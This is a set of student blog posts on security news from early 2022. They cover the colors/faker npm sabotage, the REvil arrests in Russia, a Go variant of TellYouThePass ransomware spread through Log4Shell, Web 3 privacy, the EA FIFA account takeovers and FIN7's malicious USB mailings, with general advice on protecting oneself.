What is open-source software (OSS)?

In the context of software development, open-source refers to a set of code (a.k.a. a software) that is open to the public to be seen, edited and/or shared[1]. This implies that when someone downloads and uses an open-source software(OSS), the user trusts that it is reliable.

One beauty of OSS is transparency; anyone can learn and improve their programming skills by viewing and working with it. Many believe it is also better than other proprietary software as more viewers and contributors warrant better chances of fixing errors and developing upgrades. However, the reality is that not many are able to consistently commit to maintaining their OSS projects. Especially, when the scale is enormous and without compensation or support. Although there are ways OSS developers can gain financial support through sponsorships like on GitHub and crowd funding like Buy Me A Coffee, maintenance contracts and being compensated properly by companies for their service is rare[2]. 

Npm libraries, ‘colors’ and ‘faker’ compromised by its creator?

In the past years there have been several cases in which OSS developers are tasked by companies, who use their projects, to help them with a problem without compensation or even support in maintenance[2]. More recently, there is news about the npm packages, specifically the utilities ‘colors’ and ‘faker’ being compromised as some users realized it generates some unusual codes [2],[3]. Speculation is that, Marak Squires, the creator of those utilities, intentionally altered the source code as a sign of protest to companies who exploit OSS developers[2][3]. So as a result, projects that rely on those npm packages were affected including the popular Amazon’s Cloud Development Kit, another OSS[2].

Arising from this, is the issue of ethics in OSS, specifically integrity, which is part of the security triad discussed in class.  Like mentioned earlier, one essence of open-source software is the freedom to improve the program by anyone. The free software foundation further specifies this condition by stating that the improvement should benefit the whole community [4]. Though it’s clear that motivations of developing OSS can vary, over the years, OSS has gained favorability mostly by staying reliable and it is its community who ensures that.

So going back to the npm issue, if the creator did indeed alter his creation as a protest, are his actions excusable? Is it ethically right to make changes in your own creation knowing that other projects rely on it? It is tragic that programmers dedicate their time and energy developing these codes and share them for free while companies make use of their work to make millions of profit and then proceed to demand help when problems arise. So even though Squire’s supposed actions are understandable and it brings light to the sad byproduct of things being ‘open’, it has to be said that its consequence leads to a question of OSS’s reliability. 

So what should be done? It is definite that proper compensation should be established; if not for the product at least for the service. Doing so keeps the enthusiasm of OSS developers as it shows respect to their creation and their efforts. This way developers who mean well in developing OSS projects would not get tempted in tampering with their own code or even taking it down.

Now, besides the creator being able to modify their own creation, part of OSS principle is that anyone can contribute. So, then how are OSS projects being kept secure from malicious modifications (besides being transparent)? 

(Feel free to write your response as a comment below. 🙂 ) 

References:

[0] B. Taubenblatt. “The case for open source software,” mcgilltribune.com https://www.mcgilltribune.com/sci-tech/the-case-for-open-source-software-011017/ (accessed on January 19, 2022)

[1]  “What is open source?,” opensource.com. https://opensource.com/resources/what-open-source#:~:text=Some%20people%20prefer%20open%20source,original%20authors%20might%20have%20missed. (accessed on: January 18, 2022)

[2] O. Williams. “Open source  developers, who work for free, are discovering they have power,” techcrunch.com. https://techcrunch.com/2022/01/18/open-source-developers-who-work-for-free-are-discovering-they-have-power/ (accessed on: January 18, 2022)

[3] H. Solomon. “Protest by open source developer raises questions about compensation and ethics,” itworldcanada.com. https://www.itworldcanada.com/article/protest-by-open-source-developer-raises-questions-about-compensation-and-ethics/470489 (accessed on: January 18, 2022)
[4] F.S. Grodzinsky et.al., “Ethical Issues in Open Source Software,” researchgate.net. https://www.researchgate.net/publication/241209540_Ethical_issues_in_open_source_software

More related readings, if interested:

• https://onezero.medium.com/the-internet-relies-on-people-working-for-free-a79104a68bcc

• https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/ 

• https://www.fsf.org/ 

• https://opensource.com/open-source-way

On January 14, 2022, the Russian government has said they’ve arrested 14 alleged cybercriminals working for a ransomware group called REvil, which has effectively crippled the group and any infrastructure they’ve used^[2]. The reason for arresting these criminals was a previous request from the US government for action against cybercriminals like REvil. ^[1]

The Group which was notorious for hacking has previously targeted many large American companies and American businesses, some notable ones being involved in the Colonial Pipeline cyberattack^[3] and an attack on an American food processor JBS^[1]. These attacks primarily used Ransomware where they would hold a system hostage and prompt the victim to send money usually via cryptocurrencies to a wallet in exchange for a decryptor^[3]. As a result of these cyberattacks this group caused millions in damages and made millions as a result of these said attacks^[3]. Many assets were seized when the Russian government raided and arrested these criminals, the amount of which was worth more than 5.6 million dollars. ^[1]

Why did the arrests come now? as it seems like the US requested Russian to act and provided information to Russia last fall^[4]. It seems like the arrest of prominent Russian cybercriminals comes at a time of high tension over border issues with Ukraine, as Russia is currently building up troops on the border with the excuse of joint exercises with Belarus^[5], in addition there have been many cyberattacks on Ukrainian governmental sites^[7]. This may be a sort of way of bargaining politically with the US. As it seems to a lot of people that Russia is using the potential arrest of cybercriminals as leverage in political discussion. These arrests may be a potential negotiation point with the US involving the discussion of Ukraine where if the US slightly backs off from Ukraine in exchange for cooperation in capturing cybercriminals based in Russia, as a large number of cybercriminals that attack the US reside in Russia^[6].

What doe this mean for cybersecurity?

Now it seems like cybercriminals cannot act without impunity anymore even if they are outside the jurisdiction of the victims country, as Russian cybercriminals previously seemed untouchable as US law enforcement could not persecute them in sovereign Russian territory. This was terrible for dissuading cyberattacks and allowed for large ransomware organizations to grow in Russia which primarily attack the US. Groups like Darkside, REvil, and GandCrab and more to target American cyberspace. It seems now that with Russian cooperation large cybercriminal groups will be forced to be more discrete and will be persecuted if they create a cyberattack which affect people in democratic countries. This overall would increase cybersecurity if Russia cooperates with American authorities persecuting cybercriminals in Russia. However, it would need to have a Russia would need to cooperate long term for the effects to last which I highly doubt would happen.

References

1. https://threatpost.com/russian-security-revil-ransomware/177660/
2. https://www.wired.com/story/russia-revil-ransomware-arrests-ukraine/
3. https://krebsonsecurity.com/2022/01/at-request-of-u-s-russia-rounds-up-14-revil-ransomware-affiliates/
4. https://www.cnbc.com/2021/07/09/ransomware-biden-presses-putin-to-disrupt-cybercriminals-in-russia.html
5. https://www.theguardian.com/world/2022/jan/17/russia-moves-troops-to-belarus-for-joint-exercises-near-ukraine-border
6. https://www.theguardian.com/technology/2021/oct/11/russia-and-nearby-states-are-origin-of-most-ransomware-says-uk-cyber-chief
7. https://www.bloomberg.com/news/articles/2022-01-14/several-ukraine-ministry-websites-struck-by-likely-cyberattack

What is Ransomware?

“Ransomware is a form of malware designed to encrypt files on a device, rendering any files and the systems that rely on them unusable. Malicious actors then demand ransom in exchange for decryption.” ^[1]

What does this mean?

Essentially, an attacker can lock you out of access to the majority of your system and the only way to re-gain access to your file/devices is by paying a ransom to the attacker via methods such as Bitcoin. These attackers use cryptocurrency for payment as these make it near impossible to track the attacker. Without access to the decryption key (the key to unlock the encrypted files) your files are rendered inaccessible. These attackers are often located in jurisdictions in which Canada/U.S.A. cannot extradite/charge these individuals.

How are these attacks executed?

• Phishing Emails.
• Visiting suspicious websites which can unknowingly download files to your device.
• Web-based instant messaging platforms.
• Directory Traversal Attack via vulnerable web servers.

Ransomware on the rise

As a society we reap the benefits of an ever growing digital world, however, we must learn how to properly protect ourselves from increasingly more advanced digital attacks. Covid-19 in particular has exacerbated the issue as attackers are taking advantage of the drastic increase in individuals whom participate in an increasingly digital world. In fact, it is reported that “ransomware attacks have increased 40% to 199.7 million cases globally in Q3 of [2020].” ^[2] This increase in Ransomware attacks means that more individuals/corporations are being targeted and this could be you! In fact, Ransomware has affected the institution in which you currently attend this class. The University of Calgary was subject to the “SamSam Ransomware” attack that took place in May 2016, which concluded with the school paying $20,000 to the attackers to retrieve access to infected files. ^[3,4]

The Log4Shell Golang “TellYouThePass” exploit

What is Log4Shell and Golang?

Log4Shell

On “9 December 2021, the zero-day vulnerability in the ubiquitous Java logger Log4j 2, known as Log4Shell” was discovered. ^[5] A zero-day vulnerability is a vulnerability which was unknown to security experts prior and which there is no solution/patch to fix said vulnerability. This particular attack method was discovered on the Java version of Minecraft, and Google has confirmed that there is over 35,000 Java packages globally which utilize Log4j 2. ^[5] This method of attack was considered serious of enough to gain a 10/10 critical rating and nearly 1 million attacks were attempted just 3 days after the vulnerability was exposed to the public. ^[5] This attack was serious enough that “Check Point researchers also recently revealed a global average of 40% of corporate networks have seen Log4Shell exploitation attempts in the first few days of the vulnerability’s disclosure.” ^[5] It is evident that this attack can be disastrous for those who use applications with vulnerabilities and for those who produce these applications with said vulnerabilities.

GoLang

GoLang (Go) is a very powerful cross-platform programming language written by Google in 2007. ^[7] When languages are not cross-platform then an application must be developed using different sets of tools depending on the operating system. Go has been gaining popularity increasingly fast and is even considered one of the top 11 programming languages according to one of the best Computer Science programs in the world, Berkeley University. ^[7]

What is this particular exploit?

While most attacks/vulnerabilities are local to one operating system, this attack in particular can target those using Windows and those using Linux operating systems. ^[6] This attack has revived the TellYouThePass exploit but now using Go as the source language the attacks are written in. ^[6] While it may seem like the same attack at the surface by using Go the attackers can re-use the vast majority of the code in multiple operating systems. This portability allows the attackers to infect a larger user-base without putting in more effort.

The Go version of the TellYouThePass attack goes further than the original attack by obfuscating data involved. ^[6] Obfuscation is a technique which generates essentially meaningless names for functions/files involved. By doing so the ability to reverse engineer (or work your way back from the end of the attack to the start in order to understand the route of attack) is greatly hindered. Hindering the ability to understand the attack hinders the ability to patch it as well, leaving more victims available.

What is the significance of this exploit?

Growing prevalence of a zero-day attack means that more individuals are targeted and thus subject to the fines in order to retrieve access to their network/devices. Attackers require a payment of 0.05 Bitcoin to gain the decryption key, this is roughly $2100 USD. ^[6] This is quite a hefty sum to pay if you want to access your personal data. With so many applications utilizing Log4j 2 it is extremely difficult to keep these services and yourself protected. This cost could potentially leave your or those you know in dire financial strain as your choice is either paying or be unable to use your computer./devices. With online activities becoming more prevalent this could mean the inability to do the job you’re hired at, coursework, communicate with family/friends, and much more.

What can you do to protect yourself?

• Ensure to update your machine regularly. This ensures that potential fixes to vulnerabilities within your operating system are applied before you become a victim.
• Only use trusted software. Before running or installing a program ensure to research the program and verify that it is legitimate.
• Update trusted software regularly. Ensure that you keep your software updated. Updates/patches are often pushed to fix security issues.
• Keep up-to-date with new vulnerabilities. You can do this by utilizing websites that report on computer security, such as BleepingComputer.com
• Ensure your security/firewall is active and updated. In modern computing simple but powerful Antivirus software can handle a majority of security risks. Something like Windows Defender is more than enough for regular usage. You should also occasionally run Malware scans.
• Browser Security. By installing add-ons you can increase your browser security exponentially. While it may take an adjustment period it will greatly benefit you. Personally in Firefox I use uBlock Origin, HTTPS Everywhere, NoScript, Decentraleyes, and Privacy Badger.

References

• https://www.cisa.gov/stopransomware ^[1]
• https://www.kratikal.com/blog/ransomware-attacks-increase-to-40-in-q3-2020/?utm_source=Ransomware%20Reminding%20Cyber%20Security%20Experts%20It%20Still%20Exists&utm_medium=Kratikal%20Blog&utm_campaign=Blog ^[2]
• https://www.cbc.ca/news/canada/calgary/university-calgary-ransomware-cyberattack-1.3620979 ^[3]
• https://calgarysun.com/news/crime/two-iranian-men-charged-by-fbi-in-ransomware-scheme-that-led-u-of-c-to-pay-20000 ^[4]
• https://www.itpro.co.uk/security/zero-day-exploit/361819/what-is-log4shell-log4j-vulnerability ^[5]
• https://www.itpro.co.uk/security/ransomware/361965/ransomware-rewritten-golang-to-target-windows-linux-users ^[6]
• https://bootcamp.berkeley.edu/blog/most-in-demand-programming-languages/ ^[7]
• https://i.ytimg.com/vi/rAOPpz5r3wM/maxresdefault.jpg ^[8]
• https://www.kaspersky.com/content/en-global/images/repository/isc/2021/ransomware.jpg ^[9]
• https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/1200px-Google_2015_logo.svg.png ^[10]
• https://images.moneycontrol.com/static-mcnews/2021/01/Bitcoin-1-770×433.jpg?impolicy=website&width=770&height=431 ^[11]
• https://www.splunk.com/content/dam/splunk2/en_us/images/campaigns/log4shell/log4j-attack-diagram-r3.jpg ^[12]

Inspired by Dylan’s tweets, I decided to look into my stored data on Google through google.com/takeout and found out how much information they have about me, which is indeed worrisome…

In recent years, we have found big companies like Facebook and Google violate privacy by exploiting vast databases of users. As web users become more and more conscious they want to use the internet without any interference and manipulation by the these tech pillars.

Such concern gave birth to Web 3 – the idea of a decentralized internet.

What exactly is Web 3?

World Wide Web has gone through 2 stages of evolutions – Web 1 and Web 2, which makes the next big thing Web 3.

During Web 1 – the first stage of the development, the internet is a collection of read-only pages with no interactivity. It was mostly personal and small companies’ sites.

During Web 2, the current phase of the internet, websites are more interactive. The end users can comment, like, share and modify pages. Technology giants such as Google and Facebook take control over commonly used applications, which allows them to gather a huge database and take advantage of user information.

Web 3, on the other hand, embraces the idea of decentralizing the storage of data by applying blockchain. Consider the internet as an editorially collaborative document, open to everyone. Anyone can edit the document, and any modifications are stored in a new sheet and recorded in the history. No one can modify the locked history, but the newest “ledger” only. In Web 3, the document data and history is kept in the individual’s servers instead of the central server. Besides, no one has access to the other’s location and database.

Based on the application of blockchain, Web 3 is expected to protect user’s cyber privacy and security.

The future of privacy and security

1. Decentralized Ownership of Data Storage

In Web 3, the user’s data is no longer stored in data centers owned by tech companies. Hence, unless someone has access to thousands of computers or blockchains, no one can use your data or controls your cyber activities.

2. More difficult for cyberattack

It also makes a cyber attack more challenging as it is not an attack on a centralized database. In Web 3, hackers must attack thousands of computers using a decentralized network simultaneously.

3. Any changes can be noticed

Since the blockchains constantly update and check each other for modifications, no single change can be made without notice. That being said, neither party can take down applications or websites at their convenience.

Last Thought

There are many controversies about Web 3. Many people worry about its lack of authorized control, especially the government. Anything can be shared even if it may spread unwanted content. In addition, the anonymity of Web 3 can open windows for criminal activities. 

Web 3 is still a blurred picture in the early stage of drafting. More or less, privacy-oriented is a worth-considering direction for the development of the World Wide Web.

How do you think about Web 3? Share your thought in the comment sections below!

References:

Boyd Cohen, P. D. C. E. O. I. M. (2018, April 23). Urban mobility: Web 2.0 (uber) vs. web 3.0 (iomob). Medium. Retrieved January 19, 2022, from https://boydcohen.medium.com/urban-mobility-web-2-0-uber-vs-web-3-0-iomob-2e424a99f8bd

Crider, M. (2017, December 13). What is a “blockchain”? How. Retrieved January 19, 2022, from https://www.howtogeek.com/335814/what-is-a-blockchain/

Curran, D. (2018, March 24). Twitter. Retrieved January 19, 2022, from https://twitter.com/iamdylancurran/status/977559925680467968

Litwack, S. (2020, May 6). Is a decentralized ‘web 3.0’ the answer to our privacy concerns? Retrieved January 19, 2022, from https://iapp.org/news/a/is-a-decentralized-web-3-0-the-answer-to-our-privacy-concerns/

Ogunmokun, A. (2022, January 13). Exactly how secure is web 3. HackerNoon. Retrieved January 19, 2022, from https://hackernoon.com/exactly-how-secure-is-web-3

O’Sullivan, F. (2022, January 14). What is web3? . How. Retrieved January 19, 2022, from https://www.howtogeek.com/779970/what-is-web3%C2%A0/

Sharma, M. (2021, November 8). Web 1.0, web 2.0 and web 3.0 with their difference. GeeksforGeeks. Retrieved January 19, 2022, from https://www.geeksforgeeks.org/web-1-0-web-2-0-and-web-3-0-with-their-difference/

On January 11th, 2021, EA has confirmed that several high profile accounts in FIFA Ultimate Team have been compromised after attackers targeted customer support, with several accounts worth in the range of one thousand dollars being completely drained of resources, or given to anonymous individuals online.

The Attack

Attackers targeted customer service representatives “Utilizing threats and other ‘social engineering’ methods” in order to bypass 2FA systems and change the email associated with the accounts without the original owners immediate knowledge or consent, compromising approximately 50 accounts.^[1] The attacks, sent primarily through the live chat feature, were initially ignored by customer support representatives, but some eventually caved due to the continued demands.^[2]

The Human Factor

No matter how secure a digital system could be on the technical side, if the humans operating the system result to be the weakest link in the chain of security, it could still prove disastrous to the overall integrity of the system. Social engineering is not a new concept, nor is it limited to only digital security, from potential attackers walking straight through reception, finding server rooms open and doors open, with systems containing potentially confidential data available in the open, to more classical social engineering attacks such as the Nigerian prince, or various shady “Tech support” companies telling you your computers compromised.

Because of the low skill requirement, yet high potential gain of phishing attacks, it is understandable that phishing is one of the most common security attacks^[3]. UCalgary students who check their emails regularly may be familiar with emails promising lucrative job opportunities if only you reply back with your personal information, a common phishing scam that could propagate in various ways in order to compromise your digital security.

The case with EA was unique in the fact that the customer service representatives had the ability to bypass 2FA systems as well as security measures that mandate additional action from the account owner, without any secondary checks from a second party such as a manager, which in the context of a security system seems like a fatal flaw disguised as a feature.

Outcome and moving forward

As for EA and the Ultimate Team players who had their accounts compromised, the company has stated it will be working to restore the users accounts back to their pre-attack state after verifying ownership, as well as mandating training for any individuals responsible for handling user accounts and data to help fight against potential future attacks. EA has also stated that they are adding a second layer of managerial approval for any email change requests, and improvements to their automated customer support systems.

However in the context of the greater internet, it would serve for everyone to remain further vigilant over both common and potential phishing attacks as they continue to rise in popularity.^[3] Phishing attacks are also rapidly changing and evolving, from attacks such as spearphishing or whaling looking to disguise the attacker as a trusted source or gain rapport with the user, to attacks such as pharming, which skip the user entirely in order to target DNS servers or email code.^[4]

References:

[1]: https://www.ea.com/en-gb/games/fifa/fifa-22/news/pitch-notes-fifa-22-account-takeover-update

[2]: https://threatpost.com/phishers-ea-gamers/177575/

[3]: https://www.cisco.com/c/en_ca/products/security/common-cyberattacks.html#~types-of-cyber-attacks

[4]: https://www.tripwire.com/state-of-security/security-awareness/6-common-phishing-attacks-and-how-to-protect-against-them/

Last Friday, 14 members of a ransomware group known as REvil were arrested by Russian authorities at the request of the United States^[1]. Of those arrested, one individual has been attributed as having been partially responsible for the Colonial Pipeline attack in May of 2021^[2]. REvil as an organization has executed numerous cyberattacks since their inception in 2019^[3], among those being attacks on American software company Kaseya^[4] and Brazil-based meat processing company JBS^[5]. This is the first major case in which Russia has cracked down on domestic cyberthreats to international organizations.

These arrests are very impactful both in terms of security and in politics. These arrests likely mean that there will be fewer attacks from this group, and those that do occur may not be as severe as those they conducted in the past. In addition to that, this sets a precedent for cooperation between the United States and Russia for action against cybersecurity threats in the future. Whether or not this kind of diplomatic relationship can or will be maintained is something we will have to observe over the coming months and/or years.

Although the arrests are big news, it is unlikely that this is the end of REvil’s attacks. Russian authorities have suggested that all (or at least most) of those arrested are not the masterminds behind the attacks, but rather underlings^[6]. Even if REvil is to be disbanded, those primarily behind the organization’s attacks will likely gather under a new (or perhaps even the same) name and continue their pursuits. We will have to see if Russian authorities continue to track down and arrest members of REvil, or if they will drop the case and consider it settled (at least for now).

This series of arrests comes at a time where political tensions are rising between Russia, Ukraine, and the United States as the Ukrainian border has become increasingly populated by Russian military forces (possibly as preparation for an invasion). It appears to be the only fruitful agreement between Russia and the U.S. as other talks about peace for Ukraine have failed^[7]. It is possible that the Russian government’s cooperation in this case may be related to these events.

The action of the Russian government in dealing with this domestic hacker group has spawned some interesting discussion and gives us something in the cybersecurity space to observe as time passes. Whether cooperation between the United States and Russia continue, conflicts of interest occur (as they often do), or further events bring more information to light, there’s a lot to keep an eye on.

• References
  • [1] Dixon, R., & Nakashima, E. (2022, January 15). Russia arrests 14 alleged members of Revil Ransomware Gang, including Hacker U.S. says conducted Colonial Pipeline Attack. The Washington Post. Retrieved January 18, 2022, from https://www.washingtonpost.com/world/2022/01/14/russia-hacker-revil/
  • [2] Miller, M. (2022, January 14). Russia arrests Hacker in colonial pipeline attack, U.S. says. POLITICO. Retrieved January 18, 2022, from https://www.politico.com/news/2022/01/14/russia-colonial-pipeline-arrest-527166
  • [3] Wikimedia Foundation. (2022, January 15). Revil. Wikipedia. Retrieved January 18, 2022, from https://en.wikipedia.org/wiki/REvil
  • [4] Wikimedia Foundation. (2021, November 27). Kaseya VSA ransomeware attack. Wikipedia. Retrieved January 18, 2022, from https://en.wikipedia.org/wiki/Kaseya_VSA_ransomware_attack
  • [5] Wikimedia Foundation. (2021, September 25). JBS S.A. cyberattack. Wikipedia. Retrieved January 18, 2022, from https://en.wikipedia.org/wiki/JBS_S.A._cyberattack
  • [6]Leyden, J. (2022, January 17). Celebrations over Revil ransomware arrests in Russia may be premature. The Daily Swig | Cybersecurity news and views. Retrieved January 18, 2022, from https://portswigger.net/daily-swig/celebrations-over-revil-ransomware-arrests-in-russia-may-be-premature
  • [7] Kirby, P. (2022, January 14). Is Russia preparing to invade Ukraine? and other questions. BBC News. Retrieved January 18, 2022, from https://www.bbc.com/news/world-europe-56720589

Last week, the Federal Bureau of Investigation has warned government organizations and private businesses that ransomware-infested USB sticks have been shipped across the United States by a ransomware group called FIN7 (Vaas, 2022). Concerningly, FIN7 has masked its packages to appear authentic and originating from Amazon and/or federal agencies. FIN7’s objective is to compromise the software and hold the organization hostage after an unfortunate employee connects their electronic devices to the infected USB (beginning the virus’s installation).

This is disturbing, especially in the present pandemic as most of the population requires adequate software and internet services to remain connected to their day-to-day duties (such as with their office). Although the story from Vaas (2022) is reportedly occurring in the United States, the same problem exists in Canada. Malware has become a serious concern since the start of the pandemic with Canada’s own federal cryptologic agency, Communication Security Establishment, raising alarm bells that malware attacks are becoming more aggressive—specifically targeting critical economic infrastructure and individual Canadians (Reuters, 2021). Since the pandemic began, ransomware attacks have grown in popularity with renegade groups. In 2021, victims of malware attacks have lost, on average, over two million dollars which is double the financial losses reported in 2020 (Reuters, 2021).

But how can someone be tricked by a random USB stick? Surprisingly, this ransomware tactic is very effective in producing results. For example, a study back in 2016 tested this USB-tactic by having nearly 300 USB sticks dropped around a university campus. What the study discovered was that nearly half of the found USB sticks were, in fact, plugged into personal devices by both students and staff (Tischer et al. 2016, p.1). The reason why these individuals connected these USBs to their personal computers was due to their sincere intention of finding the original owner of the device and returning it (Tischer et al. 2016).

In this pandemic, this tactic remains dangerous for unsuspecting individuals. Groups like FIN7 are exploiting individuals that are acting out of personal curiosity and a desire to identify the device’s original owner (and return it). But masquerading their infected devices as government property will mean more people may be willing to believe the device can actually be trusted. Since USBs are easy to produce they are ideal for attacking multiple agencies with little effort.

But how can one identify if their devices are safe to use? Vaas (2022) provides a few steps to steer clear of an infected USB device:

1. Do not plug in an unknown USB device, especially if you do not know who the original owner is.
2. Install “endpoint protection software” which monitors new devices that have gained access to your software.
3. Follow the protocol called “CAP”: cap the number of external software entry points, reduce internal access points, and patch unknown entry points.

This is not just about securing the country’s own vital economic infrastructure but securing your own personal information and devices. The last thing any of us students want is to lose our data and research projects to a USB that supposedly has the Final Exam’s Answers.

References

Reuters. “Ransomware attacks soar, hackers set to become more aggressive – Canada spy agency.” Reuters, December 6, 2021. https://www.reuters.com/technology/ransomware-attacks-soar-hackers-set-become-more-aggressive-canada-spy-agency-2021-12-06/ (Accessed January 16, 2022).

Tischer, Matthew, Zakir Durumeric, Sam Foster, Sunny Duan, Alec Mori, Elie Bursztein, and Michael Bailey. “Users really do plug in USB drives they find.” In 2016 IEEE Symposium on Security and Privacy (SP), pp. 306-319. IEEE, 2016.

Vaas, Lisa. “FIN7 Mails malicious USB sticks to drop ransomware.” Threat Post, January 11, 2022, https://threatpost.com/fin7-mailing-malicious-usb-sticks-ransomware/177541/ (Accessed January 16, 2022).